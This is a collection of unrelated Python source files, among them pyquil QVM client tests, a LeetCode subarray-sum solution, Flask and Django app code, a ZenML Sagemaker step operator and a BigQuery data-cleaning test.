from pyquil.api._qvm_client import (
QVMClient,
GetWavefunctionResponse,
GetWavefunctionRequest,
MeasureExpectationResponse,
MeasureExpectationRequest,
RunAndMeasureProgramResponse,
RunAndMeasureProgramRequest,
RunProgramRequest,
RunProgramResponse,
)
def test_init__sets_base_url_and_timeout(client_configuration: QCSClientConfiguration):
    """QVMClient should take its base URL from the profile and keep the given timeout."""
    qvm_client = QVMClient(client_configuration=client_configuration, request_timeout=3.14)

    assert qvm_client.base_url == client_configuration.profile.applications.pyquil.qvm_url
    assert qvm_client.timeout == 3.14
def test_sets_timeout_on_requests(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
    """Every outgoing request should carry the client's configured timeout."""
    qvm_client = QVMClient(client_configuration=client_configuration, request_timeout=0.1)

    # The mock callback asserts on the request extensions before answering
    # with a plausible version string.
    def assert_timeout(request: httpx.Request, ext: Dict[str, Any]):
        assert ext["timeout"] == httpx.Timeout(qvm_client.timeout).as_dict()
        return to_response(data="1.2.3 [abc123]")

    httpx_mock.add_callback(assert_timeout)

    qvm_client.get_version()
def test_get_version__returns_version(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
    """get_version() should strip the trailing build hash from the server's reply."""
    qvm_client = QVMClient(client_configuration=client_configuration)

    # match_content pins the exact JSON body the client is expected to POST.
    httpx_mock.add_response(
        url=client_configuration.profile.applications.pyquil.qvm_url,
        match_content=json.dumps({"type": "version"}).encode(),
        data="1.2.3 [abc123]",
    )

    assert qvm_client.get_version() == "1.2.3"
def test_run_program__returns_results(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
    """run_program() should POST a "multishot" request and wrap the readout data."""
    qvm_client = QVMClient(client_configuration=client_configuration)

    # match_content pins the exact JSON body the client must send for this request.
    httpx_mock.add_response(
        url=client_configuration.profile.applications.pyquil.qvm_url,
        match_content=json.dumps(
            {
                "type": "multishot",
                "compiled-quil": "some-program",
                "addresses": {"ro": True},
                "trials": 1,
                "measurement-noise": (3.14, 1.61, 6.28),
                "gate-noise": (1.0, 2.0, 3.0),
                "rng-seed": 314,
            },
        ).encode(),
        json={"ro": [[1, 0, 1]]},
    )

    request = RunProgramRequest(
        program="some-program",
        addresses={"ro": True},
        trials=1,
        measurement_noise=(3.14, 1.61, 6.28),
        gate_noise=(1.0, 2.0, 3.0),
        seed=314,
    )
    assert qvm_client.run_program(request) == RunProgramResponse(results={"ro": [[1, 0, 1]]})
def test_run_and_measure_program__returns_results(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
    """run_and_measure_program() should POST a "multishot-measure" request and wrap the shot matrix."""
    qvm_client = QVMClient(client_configuration=client_configuration)

    # match_content pins the exact JSON body the client must send for this request.
    httpx_mock.add_response(
        url=client_configuration.profile.applications.pyquil.qvm_url,
        match_content=json.dumps(
            {
                "type": "multishot-measure",
                "compiled-quil": "some-program",
                "qubits": [0, 1, 2],
                "trials": 1,
                "measurement-noise": (3.14, 1.61, 6.28),
                "gate-noise": (1.0, 2.0, 3.0),
                "rng-seed": 314,
            },
        ).encode(),
        json=[[1, 0, 1]],
    )

    request = RunAndMeasureProgramRequest(
        program="some-program",
        qubits=[0, 1, 2],
        trials=1,
        measurement_noise=(3.14, 1.61, 6.28),
        gate_noise=(1.0, 2.0, 3.0),
        seed=314,
    )
    assert qvm_client.run_and_measure_program(request) == RunAndMeasureProgramResponse(results=[[1, 0, 1]])
def test_measure_expectation__returns_expectation(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
    """measure_expectation() should POST an "expectation" request and unpack the values."""
    qvm_client = QVMClient(client_configuration=client_configuration)

    # match_content pins the exact JSON body the client must send for this request.
    httpx_mock.add_response(
        url=client_configuration.profile.applications.pyquil.qvm_url,
        match_content=json.dumps(
            {
                "type": "expectation",
                "state-preparation": "some-program",
                "operators": ["some-op-program"],
                "rng-seed": 314,
            },
        ).encode(),
        json=[0.161],
    )

    request = MeasureExpectationRequest(
        prep_program="some-program",
        pauli_operators=["some-op-program"],
        seed=314,
    )
    assert qvm_client.measure_expectation(request) == MeasureExpectationResponse(expectations=[0.161])
def test_get_wavefunction__returns_wavefunction(client_configuration: QCSClientConfiguration, httpx_mock: HTTPXMock):
    """get_wavefunction() should POST a "wavefunction" request and return the raw bytes."""
    qvm_client = QVMClient(client_configuration=client_configuration)

    # match_content pins the exact JSON body the client must send for this request.
    httpx_mock.add_response(
        url=client_configuration.profile.applications.pyquil.qvm_url,
        match_content=json.dumps(
            {
                "type": "wavefunction",
                "compiled-quil": "some-program",
                "measurement-noise": (3.14, 1.61, 6.28),
                "gate-noise": (1.0, 2.0, 3.0),
                "rng-seed": 314,
            },
        ).encode(),
        data=b"some-wavefunction",
    )

    request = GetWavefunctionRequest(
        program="some-program",
        measurement_noise=(3.14, 1.61, 6.28),
        gate_noise=(1.0, 2.0, 3.0),
        seed=314,
    )
    assert qvm_client.get_wavefunction(request) == GetWavefunctionResponse(wavefunction=b"some-wavefunction")
| StarcoderdataPython |
9673928 | __source__ = 'https://leetcode.com/problems/continuous-subarray-sum/'
# Time: O(n^2)
# Space: O(n)
#
# Description: Leetcode # 523. Continuous Subarray Sum
#
# Given a list of non-negative numbers and a target integer k, write a function to check if
# the array has a continuous subarray of size at least 2 that sums up to the multiple of k,
# that is, sums up to n*k where n is also an integer.
# Example 1:
# Input: [23, 2, 4, 6, 7], k=6
# Output: True
# Explanation: Because [2, 4] is a continuous subarray of size 2 and sums up to 6.
# Example 2:
# Input: [23, 2, 6, 4, 7], k=6
# Output: True
# Explanation: Because [23, 2, 6, 4, 7] is an continuous subarray of size 5 and sums up to 42.
# Note:
# The length of the array won't exceed 10,000.
# You may assume the sum of all the numbers is in the range of a signed 32-bit integer.
# Hide Company Tags Facebook
# Hide Tags Dynamic Programming Math
# Hide Similar Problems (M) Subarray Sum Equals K
#
# explanation =
# if k == 0
# If there are two continuous zeros in nums, return True
# Time O(n).
#
# if n >= 2k and k > 0
# There will be at least three numbers in sum with the same remainder divided by k. So I can return True without any extra calculation.
# Time O(1).
#
# if n < 2k and k > 0
# If I can find two numbers in sum with the same remainder divided by k
# and the distance of them is greater than or equal to 2, return True.
# Time O(n) <= O(k).
#
# k < 0
# same as k > 0.
#
class Solution(object):
    def checkSubarraySum(self, nums, k):
        """Return True if nums contains a contiguous subarray of length >= 2
        whose sum is a multiple of k (n*k for some integer n, including 0).

        Runs in O(min(n, k)) extra space and O(n) time (O(1) when n >= 2k).
        """
        if k == 0:
            # Only a run of two consecutive zeros can sum to 0.
            # Time O(n).
            for i in range(len(nums) - 1):
                if nums[i] == 0 and nums[i + 1] == 0:
                    return True
            return False
        k = abs(k)
        if len(nums) >= k * 2:
            # Pigeonhole: among > 2k prefix sums mod k, three share a
            # remainder, so two repeats are >= 2 indices apart. Time O(1).
            return True
        # n < 2k: if two prefix sums share a remainder mod k and their
        # indices are >= 2 apart, the span between them sums to a multiple
        # of k. (Renamed from the original's builtin-shadowing `sum`.)
        prefix = [0]
        for x in nums:
            prefix.append((prefix[-1] + x) % k)
        first_index = {}
        for i, remainder in enumerate(prefix):
            # Bug fix: original used dict.has_key(), which was removed in
            # Python 3 and raises AttributeError there.
            if remainder in first_index:
                if i - first_index[remainder] > 1:
                    return True
            else:
                first_index[remainder] = i
        return False
Java = '''
# Thought: https://leetcode.com/problems/continuous-subarray-sum/solution/
# Approach #2 Better Brute Force [Accepted]
# Time complexity : O(n^2). Two for loops are used for considering every subarray possible.
# Space complexity : O(n). sumsum array of size nn is used.
# 50ms 22.98%
class Solution {
public boolean checkSubarraySum(int[] nums, int k) {
int[] sums = new int[nums.length];
sums[0] = nums[0];
for (int i = 1; i < nums.length; i++) sums[i] = sums[i - 1] + nums[i];
for (int i = 0; i < nums.length - 1; i++) {
for (int j = i + 1; j < nums.length; j++) {
int ttl = sums[j] - sums[i] + nums[i];
if ( ttl == k || (k != 0 && ttl % k == 0)) return true;
}
}
return false;
}
}
# Approach #3 Using HashMap [Accepted]
# Time complexity : O(n). Only one traversal of the array numsnums is done.
# Space complexity : O(min(n,k)). The HashMap can contain upto min(n,k)min(n,k) different pairings.
# whenever the same sum % k sum value is obtained corresponding to two indices i and j,
# it implies that sum of elements between those indices is an integer multiple of k.
# subArray sum i = k * m + (remainder); 1)
# subArray sum j = k * n + (remainder); 2)
# let 1 - 2) = k * (m - n)
# 9ms 44.20%
class Solution {
public boolean checkSubarraySum(int[] nums, int k) {
Map<Integer, Integer> map = new HashMap();
int sum = 0;
map.put(0, -1);
for (int i = 0; i < nums.length; i++) {
sum += nums[i];
if (k != 0) sum = sum % k;
if (map.get(sum) == null) map.put(sum, i);
else {
if (i - map.get(sum) > 1) { //considering [0, 0, 0] 0, at index 0, continue;
return true;
}
}
}
return false;
}
}
'''
| StarcoderdataPython |
11355261 | <filename>todo/__init__.py
import os
from flask import Flask
def create_app():
    """Application factory for the todo Flask app.

    Pulls database settings from FLASK_* environment variables, registers
    the auth and todo blueprints, and wires up DB teardown.

    Returns:
        The configured Flask application.
    """
    app = Flask(__name__)
    app.config.from_mapping(
        # Security fix: prefer a real secret from the environment; fall back
        # to the historical hard-coded key so existing deployments keep working.
        SECRET_KEY=os.environ.get('FLASK_SECRET_KEY', 'mykey'),
        DATABASE_HOST=os.environ.get('FLASK_DATABASE_HOST'),
        DATABASE=os.environ.get('FLASK_DATABASE'),
        DATABASE_USER=os.environ.get('FLASK_DATABASE_USER'),
        DATABASE_PASSWORD=os.environ.get('FLASK_DATABASE_PASSWORD')
    )

    # Close DB connections when the app context tears down.
    from . import db
    db.teardown_appcontext_closedb(app)

    from . import auth
    app.register_blueprint(auth.bp)

    from . import todo
    app.register_blueprint(todo.bp)

    return app
3444100 | <filename>src/test/test_tools.py
import sys
sys.path.append('../')
import unittest
from cog_abm.extras.tools import calc_auc
class TestAucCalculations(unittest.TestCase):
    """Checks calc_auc against hand-computed trapezoid areas."""

    def setUp(self):
        pass

    def test_auc(self):
        cases = [
            ([(0, 0), (1, 2), (2, 0)], 2.),
            ([(0, 1), (1, 1)], 1),
            ([(0., 0.5), (1, 2), (2, 2.)], 1.25 + 2.),
        ]
        for points, expected in cases:
            self.assertEqual(expected, calc_auc(points))
| StarcoderdataPython |
3301152 | from django.contrib import admin
# Register your models here.
from .models import tag_store, stat_store
# Expose both storage models in the Django admin interface.
admin.site.register(tag_store)
admin.site.register(stat_store)
359717 | <filename>src/model_selection_monk_test.py
from utility import read_monk_dataset
from model_selection import grid_search, get_best_models
if __name__ == '__main__':
    # read dataset
    tr_ds_name = "monks-3.train"
    ts_ds_name = "monks-3.test"  # NOTE(review): defined but not used below — confirm intent

    # grid search parameters (each value is a tuple of candidates)
    gs_params = {'units_per_layer': ([4, 1], [8, 1], [16, 1]),
                 'act_functions': (['relu', 'sigmoid'],),
                 'weights_init': ('glorot',),
                 'momentum': (0.8, 0.9),
                 'nesterov': (True,),
                 'batch_size': ('full',),
                 'lr': (0.76, 0.8),
                 'error_func': ('squared_error',),
                 'metr': ('binary_class_accuracy',),
                 'lambda_': (0.001, 0.0001, 0.005),
                 'reg_type': ('lasso', 'ridge_regression'),
                 'epochs': (500,)}

    # coarse grid search. Results are saved on file
    grid_search(dataset=tr_ds_name, params=gs_params, coarse=True)
    # retrieve the 5 best configurations, then keep only the top one
    _, best_params = get_best_models(dataset=tr_ds_name, coarse=True, n_models=5)
    best_params = best_params[0]
    for p,v in best_params.items():
        print(p,v)
6680540 | # -*- coding: utf-8 -*-
from annohub import app
from flask import flash, render_template, abort, redirect, url_for
#from flask import request, session
from annohub.lib.db import Db as DbImport
import annohub.lib.user as user
from annohub import login_manager
#from bson import DocumentTooLarge
# flash can take the following properties:
# bg-primary
# bg-success
# bg-info
# bg-warning
# bg-danger
import datetime

# Captured once at import time and not referenced in the code visible here.
# NOTE(review): a handler needing the current time should call
# datetime.datetime.now() per request instead.
now = datetime.datetime.now()
@login_manager.user_loader
def load_user(name):
    """Flask-Login user loader: resolve the session's stored name to a user object."""
    return user._get_by_name(name)
@login_manager.unauthorized_handler
def unauthorized():
    """Invoked when an anonymous client requests a login-protected view."""
    flash('Please log in.', "bg-warning")
    return redirect(url_for('auth.login'))
@app.errorhandler(404)
def page_not_found(e):
    """Render the shared error page for HTTP 404 (page not found)."""
    err = dict(
        code=404,
        message="page not found",
        desc="We are sorry, but the page you are looking for could not be found.",
    )
    return render_template('error.html', err=err), 404
@app.errorhandler(403)
def page_not_allowed(e):
    """Render the shared error page for HTTP 403 (permission denied)."""
    err = dict(
        code=403,
        message="permission denied",
        desc="Please authenticate yourself if you want to view this page.",
    )
    return render_template('error.html', err=err), 403
@app.errorhandler(405)
def method_not_allowed(e):
    """Render the shared error page for HTTP 405 (method not allowed)."""
    err = dict(
        code=405,
        message="method not allowed",
        desc="The method you used is not allowed.",
    )
    return render_template('error.html', err=err), 405
@app.errorhandler(500)
def internal_server_error(e):
    """Render the shared error page for HTTP 500 (internal server error)."""
    err = dict(
        code=500,
        message="internal server error",
        desc="We are sorry, but the server has internal problems.",
    )
    return render_template('error.html', err=err), 500
@app.route(app.config['RESET_DB_URL'])
def reset(secret_token=None):
    """Reset the database, guarded by a secret token embedded in the URL.

    NOTE(review): ``==`` on secrets is not constant-time; consider
    hmac.compare_digest if timing attacks are a concern here.
    """
    if secret_token == app.config['SECRET_RESET_DB_TOKEN']:
        this_dbi = DbImport()
        this_dbi.reset()
        flash('Reset was successfull.', 'bg-success')
        return redirect(url_for('index'))
    else:
        # Wrong or missing token: pretend the page is forbidden.
        abort(403)
@app.route(app.config['SETUP_DB_URL'])
def setup(secret_token=None):
    """Run the initial database setup, guarded by a secret token in the URL.

    The success message asks for an application restart, matching the
    setup flow used here.
    """
    if secret_token == app.config['SECRET_SETUP_DB_TOKEN']:
        this_dbi = DbImport()
        this_dbi.setup()
        flash('Setup was successfull. Restart the application.', 'bg-warning')
        return redirect(url_for('index'))
    else:
        abort(403)
@app.route(app.config['UPDATE_NLTK_URL'])
def update(secret_token=None):
    """Run the importer's NLTK setup step, guarded by a secret token in the URL."""
    if secret_token == app.config['SECRET_NLTK_TOKEN']:
        this_dbi = DbImport()
        this_dbi._nltk_setup()
        flash('Update was successfull.', 'bg-success')
        return redirect(url_for('index'))
    else:
        abort(403)
| StarcoderdataPython |
3433419 | # Copyright (c) ZenML GmbH 2022. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
from typing import ClassVar, List, Optional
import sagemaker
from zenml.enums import StackComponentType
from zenml.repository import Repository
from zenml.stack import Stack, StackValidator
from zenml.stack.stack_component_class_registry import (
register_stack_component_class,
)
from zenml.step_operators import BaseStepOperator
from zenml.utils import docker_utils
from zenml.utils.source_utils import get_source_root_path
@register_stack_component_class
class SagemakerStepOperator(BaseStepOperator):
"""Step operator to run a step on Sagemaker.
This class defines code that builds an image with the ZenML entrypoint
to run using Sagemaker's Estimator.
Attributes:
role: The role that has to be assigned to the jobs which are
running in Sagemaker.
instance_type: The type of the compute instance where jobs will run.
base_image: [Optional] The base image to use for building the docker
image that will be executed.
bucket: [Optional] Name of the S3 bucket to use for storing artifacts
from the job run. If not provided, a default bucket will be created
based on the following format: "sagemaker-{region}-{aws-account-id}".
experiment_name: [Optional] The name for the experiment to which the job
will be associated. If not provided, the job runs would be
independent.
"""
role: str
instance_type: str
base_image: Optional[str] = None
bucket: Optional[str] = None
experiment_name: Optional[str] = None
# Class Configuration
FLAVOR: ClassVar[str] = "sagemaker"
@property
def validator(self) -> Optional[StackValidator]:
"""Validates that the stack contains a container registry."""
def _ensure_local_orchestrator(stack: Stack) -> bool:
return stack.orchestrator.FLAVOR == "local"
return StackValidator(
required_components={StackComponentType.CONTAINER_REGISTRY},
custom_validation_function=_ensure_local_orchestrator,
)
def _build_docker_image(
self,
pipeline_name: str,
requirements: List[str],
entrypoint_command: List[str],
) -> str:
repo = Repository()
container_registry = repo.active_stack.container_registry
if not container_registry:
raise RuntimeError("Missing container registry")
registry_uri = container_registry.uri.rstrip("/")
image_name = f"{registry_uri}/zenml-sagemaker:{pipeline_name}"
docker_utils.build_docker_image(
build_context_path=get_source_root_path(),
image_name=image_name,
entrypoint=" ".join(entrypoint_command),
requirements=set(requirements),
base_image=self.base_image,
)
docker_utils.push_docker_image(image_name)
return docker_utils.get_image_digest(image_name) or image_name
    def launch(
        self,
        pipeline_name: str,
        run_name: str,
        requirements: List[str],
        entrypoint_command: List[str],
    ) -> None:
        """Launches a step on Sagemaker.
        Args:
            pipeline_name: Name of the pipeline which the step to be executed
                is part of.
            run_name: Name of the pipeline run which the step to be executed
                is part of.
            entrypoint_command: Command that executes the step.
            requirements: List of pip requirements that must be installed
                inside the step operator environment.
        """
        # Build and push the step image first; the resulting digest/tag is
        # what the Estimator pulls.
        image_name = self._build_docker_image(
            pipeline_name=pipeline_name,
            requirements=requirements,
            entrypoint_command=entrypoint_command,
        )
        # default_bucket=None lets Sagemaker fall back to its default bucket.
        session = sagemaker.Session(default_bucket=self.bucket)
        estimator = sagemaker.estimator.Estimator(
            image_name,
            self.role,
            instance_count=1,
            instance_type=self.instance_type,
            sagemaker_session=session,
        )
        # Sagemaker doesn't allow any underscores in job/experiment/trial names
        sanitized_run_name = run_name.replace("_", "-")
        experiment_config = {}
        if self.experiment_name:
            experiment_config = {
                "ExperimentName": self.experiment_name,
                "TrialName": sanitized_run_name,
            }
        # wait=True blocks until the training job finishes.
        estimator.fit(
            wait=True,
            experiment_config=experiment_config,
            job_name=sanitized_run_name,
        )
| StarcoderdataPython |
12860399 | """
Ensures there is no data past the deactivation date for deactivated participants.
Original Issue: DC-686
The intent is to sandbox and drop records dated after the date of deactivation for participants
who have deactivated from the Program
This test will mock calling the PS API and provide a returned value. Everything
within the bounds of our team will be tested.
"""
# Python imports
import mock
import os
# Third party imports
import pandas as pd
# Project imports
from app_identity import PROJECT_ID
from common import OBSERVATION
from cdr_cleaner.cleaning_rules.remove_participant_data_past_deactivation_date import (
RemoveParticipantDataPastDeactivationDate)
from constants.retraction.retract_deactivated_pids import DEACTIVATED_PARTICIPANTS
from tests.integration_tests.data_steward.cdr_cleaner.cleaning_rules.bigquery_tests_base import BaseTest
class RemoveParticipantDataPastDeactivationDateTest(
        BaseTest.CleaningRulesTestBase):
    """Integration test for RemoveParticipantDataPastDeactivationDate.

    The PS API call is mocked; everything else runs against real BigQuery
    test datasets configured through environment variables.
    """

    @classmethod
    def setUpClass(cls):
        # Make the test easy to spot in the integration-test log output.
        print('**************************************************************')
        print(cls.__name__)
        print('**************************************************************')
        super().initialize_class_vars()
        # set the test project identifier
        project_id = os.environ.get(PROJECT_ID)
        cls.project_id = project_id
        # set the expected test datasets
        dataset_id = os.environ.get('COMBINED_DATASET_ID')
        cls.dataset_id = dataset_id
        sandbox_id = f"{dataset_id}_sandbox"
        cls.sandbox_id = sandbox_id
        cls.kwargs = {
            'table_namer': 'bar_ds',
            'api_project_id': 'foo-project-id'
        }
        cls.rule_instance = RemoveParticipantDataPastDeactivationDate(
            project_id, dataset_id, sandbox_id, **cls.kwargs)
        sb_table_names = cls.rule_instance.get_sandbox_tablenames()
        cls.fq_sandbox_table_names = [
            f'{project_id}.{sandbox_id}.{table_name}'
            for table_name in sb_table_names
        ]
        # append table name here to ensure proper cleanup
        cls.fq_sandbox_table_names.append(
            f"{project_id}.{sandbox_id}.{DEACTIVATED_PARTICIPANTS}")
        cls.fq_table_names = [
            f"{project_id}.{dataset_id}.{tablename}"
            for tablename in cls.rule_instance.affected_tables
        ]
        # Only the observation table is loaded with fixture data in setUp.
        cls.fq_obs_table = [
            table for table in cls.fq_table_names if 'observation' in table
        ][0]
        # call super to set up the client, create datasets, and create
        # empty test tables
        # NOTE: does not create empty sandbox tables.
        super().setUpClass()

    def setUp(self):
        """
        Add data to the tables for the rule to run on.
        """
        insert_fake_data_tmpls = [
            self.jinja_env.from_string("""
            INSERT INTO `{{fq_table_name}}`
            (observation_id, person_id, observation_concept_id, observation_date,
             observation_type_concept_id, observation_source_concept_id)
            VALUES
              -- Values to exist after running the cleaning rule --
              -- 801 is before the user deactivates --
              -- 802, the user doesn't deactivate --
              (801, 1, 1585899, date('2019-05-01'), 45905771, 111111),
              (802, 2, 1585899, date('2019-05-01'), 45905771, 222222),
              -- Values that should be removed by the cleaning rule --
              -- 804 is after person 1 deactivates --
              -- 805 is after user 3 deactivates --
              (804, 1, 1585899, date('2020-05-01'), 45905771, null),
              (805, 3, 1585899, date('2020-05-01'), 45905771, 45)
            """)
        ]
        self.load_statements = []
        # create the string(s) to load the data
        for tmpl in insert_fake_data_tmpls:
            query = tmpl.render(fq_table_name=self.fq_obs_table)
            self.load_statements.append(query)
        super().setUp()

    @mock.patch(
        'utils.participant_summary_requests.get_deactivated_participants')
    @mock.patch('retraction.retract_utils.is_deid_label_or_id')
    def test_removing_data_past_deactivated_date(self, mock_deid, mock_func):
        """
        Validate deactivated participant records are dropped via cleaning rule.
        Validates pre-conditions, test execution and post conditions based on
        the load statements and the tables_and_counts variable. Uses a mock to
        return a staged data frame object for this test instead of calling
        the PS API.
        """
        columns = ['deactivated_date', 'person_id', 'suspension_status']
        values = [
            ['2020-01-01', 1, 'NO_CONTACT'],  # corresponds with record 804
            ['2020-01-01', 3, 'NO_CONTACT']  # corresponds with record 805
        ]
        deactivated_df = pd.DataFrame(values, columns=columns)
        mock_func.return_value = deactivated_df
        mock_deid.return_value = False
        self.load_test_data(self.load_statements)
        # Using the 0 position because there is only one sandbox table and
        # one affected OMOP table
        obs_sandbox = [
            table for table in self.fq_sandbox_table_names
            if 'observation' in table
        ][0]
        tables_and_counts = [{
            'name': 'observation',
            'fq_table_name': self.fq_obs_table,
            'fq_sandbox_table_name': obs_sandbox,
            'fields': ['observation_id'],
            'loaded_ids': [801, 802, 804, 805],
            'sandboxed_ids': [804, 805],
            'cleaned_values': [(801,), (802,)]
        }]
        self.default_test(tables_and_counts)
| StarcoderdataPython |
1639877 | <filename>algorithms/algo.py<gh_stars>0
import sys
import numpy as np
import argparse
import copy
import random
import json
import torch
from torch.autograd import grad
from torch import nn, optim
from torch.nn import functional as F
from torchvision import datasets, transforms
from torchvision.utils import save_image
from torch.autograd import Variable
import torch.utils.data as data_utils
from utils.match_function import get_matched_pairs
class BaseAlgo():
    """Base class for the domain-generalization training algorithms.

    Stores the datasets and bookkeeping shared by all algorithms, builds the
    model/optimizer/scheduler, and provides helpers for computing matched
    pairs across domains and for evaluating accuracy.

    Fixes over the previous revision:
      * ``get_match_function`` returned undefined names (NameError) when
        ``args.match_flag`` was false, because results were bound to unused
        temporaries.
      * ``get_test_accuracy`` always iterated the *test* dataset, even when
        asked to evaluate on the validation split.
    """
    def __init__(self, args, train_dataset, val_dataset, test_dataset, train_domains, total_domains, domain_size, training_list_size, base_res_dir, run, cuda):
        self.args= args
        self.train_dataset= train_dataset
        self.val_dataset= val_dataset
        self.test_dataset= test_dataset
        self.train_domains= train_domains
        self.total_domains= total_domains
        self.domain_size= domain_size
        self.training_list_size= training_list_size
        self.base_res_dir= base_res_dir
        self.run= run
        self.cuda= cuda
        # Identifier used to name checkpoints for this hyper-parameter setting.
        self.post_string= str(self.args.penalty_ws) + '_' + str(self.args.penalty_diff_ctr) + '_' + str(self.args.match_case) + '_' + str(self.args.match_interrupt) + '_' + str(self.args.match_flag) + '_' + str(self.run) + '_' + self.args.pos_metric + '_' + self.args.model_name
        self.phi= self.get_model()
        self.opt= self.get_opt()
        self.scheduler = torch.optim.lr_scheduler.StepLR(self.opt, step_size=25)
        self.final_acc=[]
        self.val_acc=[]
    def get_model(self):
        """Instantiate the backbone network selected by ``args.model_name``."""
        if self.args.model_name == 'lenet':
            from models.lenet import LeNet5
            phi= LeNet5()
        if self.args.model_name == 'alexnet':
            from models.alexnet import alexnet
            phi= alexnet(self.args.out_classes, self.args.pre_trained, self.args.method_name)
        if self.args.model_name == 'domain_bed_mnist':
            from models.domain_bed_mnist import DomainBed
            phi= DomainBed( self.args.img_c )
        if 'resnet' in self.args.model_name:
            from models.resnet import get_resnet
            # Contrastive methods use the raw representation (no FC head).
            if self.args.method_name in ['csd', 'matchdg_ctr']:
                fc_layer=0
            else:
                fc_layer= self.args.fc_layer
            phi= get_resnet(self.args.model_name, self.args.out_classes, fc_layer,
                            self.args.img_c, self.args.pre_trained)
        print('Model Architecture: ', self.args.model_name)
        phi=phi.to(self.cuda)
        return phi
    def save_model(self):
        """Persist the current model weights for this run."""
        # Store the weights of the model
        torch.save(self.phi.state_dict(), self.base_res_dir + '/Model_' + self.post_string + '.pth')
    def get_opt(self):
        """Build the optimizer over the trainable parameters of ``phi``."""
        if self.args.opt == 'sgd':
            opt= optim.SGD([
                {'params': filter(lambda p: p.requires_grad, self.phi.parameters()) },
            ], lr= self.args.lr, weight_decay= 5e-4, momentum= 0.9, nesterov=True )
        elif self.args.opt == 'adam':
            opt= optim.Adam([
                {'params': filter(lambda p: p.requires_grad, self.phi.parameters())},
            ], lr= self.args.lr)
        return opt
    def get_match_function(self, epoch):
        """Return (data, label) tensors of matched pairs across domains.

        Epoch 0 starts with a randomly defined matching; later epochs use an
        inferred (locally approximate) matching computed from the current
        representation ``phi``.
        """
        # Start initially with randomly defined batch; else find the local approximate batch
        if epoch > 0:
            inferred_match = 1
            # BUGFIX: previously, when args.match_flag was false, the results
            # were bound to unused temporaries (temp_1/temp_2), leaving the
            # returned names undefined and raising NameError.
            data_match_tensor, label_match_tensor, indices_matched, perfect_match_rank= get_matched_pairs( self.args, self.cuda, self.train_dataset, self.domain_size, self.total_domains, self.training_list_size, self.phi, self.args.match_case, inferred_match )
        else:
            inferred_match = 0
            data_match_tensor, label_match_tensor, indices_matched, perfect_match_rank= get_matched_pairs( self.args, self.cuda, self.train_dataset, self.domain_size, self.total_domains, self.training_list_size, self.phi, self.args.match_case, inferred_match )
        return data_match_tensor, label_match_tensor
    def get_test_accuracy(self, case):
        """Compute classification accuracy (%) on the 'val' or 'test' split.

        Args:
            case: Either 'val' or 'test', selecting the dataset to evaluate.

        Returns:
            The accuracy in percent over the selected split.

        Raises:
            ValueError: If ``case`` is neither 'val' nor 'test'.
        """
        test_acc= 0.0
        test_size=0
        if case == 'val':
            dataset= self.val_dataset
        elif case == 'test':
            dataset= self.test_dataset
        else:
            raise ValueError('case must be "val" or "test", got: ' + str(case))
        # BUGFIX: iterate the selected split; this previously always looped
        # over self.test_dataset, so 'val' accuracy was silently wrong.
        for batch_idx, (x_e, y_e, d_e, idx_e) in enumerate(dataset):
            with torch.no_grad():
                x_e= x_e.to(self.cuda)
                y_e= torch.argmax(y_e, dim=1).to(self.cuda)
                d_e = torch.argmax(d_e, dim=1).numpy()
                # Forward Pass
                out= self.phi(x_e)
                test_acc+= torch.sum( torch.argmax(out, dim=1) == y_e ).item()
                test_size+= y_e.shape[0]
        print(' Accuracy: ', case, 100*test_acc/test_size )
        return 100*test_acc/test_size
87014 | <filename>pychron/canvas/canvas2D/scene/primitives/dumper_primitives.py
# ===============================================================================
# Copyright 2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import Dict
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.canvas.canvas2D.scene.primitives.rounded import RoundedRectangle
class StateableRectangle(RoundedRectangle):
    """A rounded rectangle whose geometry is driven by named states.

    ``states`` maps a state name (e.g. "open"/"closed") to a dict that may
    supply a "dimension" (width, height) pair and/or a "translation"
    (x, y) pair.
    """

    # Mapping of state name -> {"dimension": (w, h), "translation": (x, y)}
    states = Dict

    def set_state(self, state):
        """Apply the geometry stored for *state* and request a re-layout.

        Booleans are shorthand: True -> "open", False -> "closed".
        """
        if isinstance(state, bool):
            state = "open" if state else "closed"

        config = self.states[state]
        self._set_dimensions(config.get("dimension"))
        self._set_translation(config.get("translation"))
        self.request_layout()

    def _set_dimensions(self, wh):
        # Missing/empty values are ignored so a state may update only one
        # aspect of the geometry.
        if wh:
            self.width, self.height = wh

    def _set_translation(self, xy):
        if xy:
            self.x, self.y = xy
class Gate(StateableRectangle):
    """Dumper gate drawn as a state-driven rectangle."""
    pass
class Funnel(StateableRectangle):
    """Dumper funnel drawn as a state-driven rectangle."""
    pass
# ============= EOF =============================================
| StarcoderdataPython |
326636 | # (C) Copyright 1996- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
import pathlib
from aviso_monitoring import __version__
from setuptools import find_packages, setup
# Runtime dependencies are maintained in requirements.txt next to this file.
_REQUIREMENTS_PATH = pathlib.Path(__file__).parent / "requirements.txt"
INSTALL_REQUIRES = _REQUIREMENTS_PATH.read_text().splitlines()

setup(
    name="aviso-monitoring",
    version=__version__,
    description="Aviso_monitoring is a library providing collectors to fetch telemetries, receivers and reporters to "
    "transmit them to the monitoring servers",
